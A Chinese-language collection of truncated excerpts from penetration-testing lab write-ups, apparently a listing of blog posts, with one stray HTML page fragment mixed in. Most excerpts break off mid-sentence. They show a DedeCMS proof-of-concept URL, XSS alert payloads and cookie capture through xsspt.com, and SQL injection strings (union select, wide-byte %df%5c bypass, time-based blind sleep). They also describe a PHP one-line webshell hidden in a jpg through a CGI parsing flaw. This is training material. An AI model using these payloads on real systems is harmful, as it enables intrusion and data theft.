打开靶场已知后台密码admin123织梦默认后台地址路径http://120.203.13.75:8123/csrf/uploads/dede本身织梦存在不少的漏洞  可以百度了解 相关知识  先放上POC语句http://120.203.13.75:8123/csrf/uploads/dede/sys_verifies.php?action=getfiles&refi

打开靶场看下靶场给了那些提示http://120.203.13.75:6815/3/dom.txt打开index传送门见框插是了一下 审查源码发现被过滤掉了继续查询新的注入点<script>alert('XSS')</script>首页让他弹窗成功弹了出来用到编码互转  百度站长工具里面有 =<script>alert('xss

打开靶场链接:现在是 FineCMS v5.3.0 于是在网上搜索了有关FineCMS v5.3.0 xss漏洞的文章看了一些文章 文章讲到是通过构造URL，让后台生成错误日志，而后台对错误日志的内容写入没有进行安全检查，导致写入的内容原原本本的显示在错误日志的页面中，当管理员在后台查看错误日志时，就会触发XSS代码 还有一些留言板漏洞 也会触发xss代码让我就去 xsspt.com注册了一个账号

<!DOCTYPE html><html><head><meta charset="utf-8"><title>个人介绍</title></head><body>    <h1>大家好我是纯情</h1>    <p

打开靶场链接：尝试使用 id=1 参数进行访问返回结果：Your sql statement is SELECT * FROM users WHERE id=("1") LIMIT 0,1获取字段数：?id=1")  order by 4 %23获取当前数据库名:?id=0") union select 1,2,database() %23获取当前

打开靶场链接：1.我们发现\的编码是%5c，然后一个‘運’字引入我们的眼帘，根据gbk的编码，‘運’字是%df%5cSELECT*FROM users WHERE id='1\''LIMIT 0,1这条语句因为\使用我们无法去注入，那么我们是不是可以用%df吃到%5c，因为如果用GBK编码的话这个就是‘運‘’字，然后成功的让闭合但引号的逃逸了转义字符。SELECT*FROM

打开靶场链接：1.?id=1 and if(ascii(substr(database)(),1.1))>120,0,sleep(10))--+利用延时猜数据库ascii码 sleep=睡 sleep(11)=睡11秒 %23=#   '=%27第一个字符     1' and if(ascii(substr(database

打开靶场链接：首页我们先猜当前数据库的名称长度id=1' and(length(database()))>9#  猜解=8 所以数据库名称字段为8url编码#=%23在这里我们利用ASCII码猜解当前数据库名称1.?id=1' and (ascii(substr(database(),1,1)))=115--+  小于大于115=s?id=1' a

打开靶场链接http://117.41.229.122:8002/xss/index.php首先在编辑框输入 123，提交：在试下 123"  发现1后面的双引号并没有将value属性的双引号闭合，而是被转义输出了在试下 123'   发现单引号可以起到闭合前面的作用oninput (有输入框，输入的时候触发)然后输入提交后，点击编辑框，并没有弹框，

打开靶场链接CGI解析漏洞跳到文件23题利用的是CGI的一个解析漏洞：当 x_pathinfo 开启时，会导致下面的问题：比如，访问 http://www.victim.com/123.jpg/1.php 时，123.jpg 会被当做php 脚本进行解析。查看源码：发现只能上传 jpg 后缀的文件：于是将php一句话木马保存到123.jpg 文件中配合CGI解析漏洞，用菜刀进行